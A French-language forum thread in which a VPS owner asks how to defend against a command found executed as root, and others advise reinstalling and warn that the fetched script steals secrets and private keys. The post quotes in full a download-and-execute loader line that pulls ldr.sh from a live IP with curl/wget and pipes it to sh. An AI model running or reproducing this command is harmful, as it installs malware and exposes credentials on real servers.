Bonjour,
J'ai remarqué sur le console cette commande qui a été exécuté en tant que root su un vps linux:
Comment je peux protéger mon vps contre ce type d'attaque sachant qu'il est désactivé par l'externe(PermitRootLogin no )
(curl 194.145.227.21/ldr.sh?e39dc2||curl 194.145.227.21/ldr.sh?e39dc2||curl -k 194.145.227.21/ldr.sh?e39dc2||curl -k 194.145.227.21/ldr.sh?e39dc2||wget -q -O- 194.145.227.21/ldr.sh?e39dc2)|sh 1>/dev/null 2>&1 &
Bonjour,
il faut sécuriser ce qui est hébergé sur le VPS également; je suis prêt à parier qu'il y a un CMS tel que wordpress/joomla/drupal dessus ?
Par contre si la commande a été exécuté en root le VPS est compromis et je vous conseil de passer par la case réinstallation avant que OVH vous coupe le VPS.
Cordialement, janus57
194.145.227.21/ldr.sh
Ce script est toujours visible. Il sert clairement à vous voler tous vos secrets, certificats et clés privées, et bien d'autres choses.
Non seulement votre serveur est compromis, mais vos trésors aussi.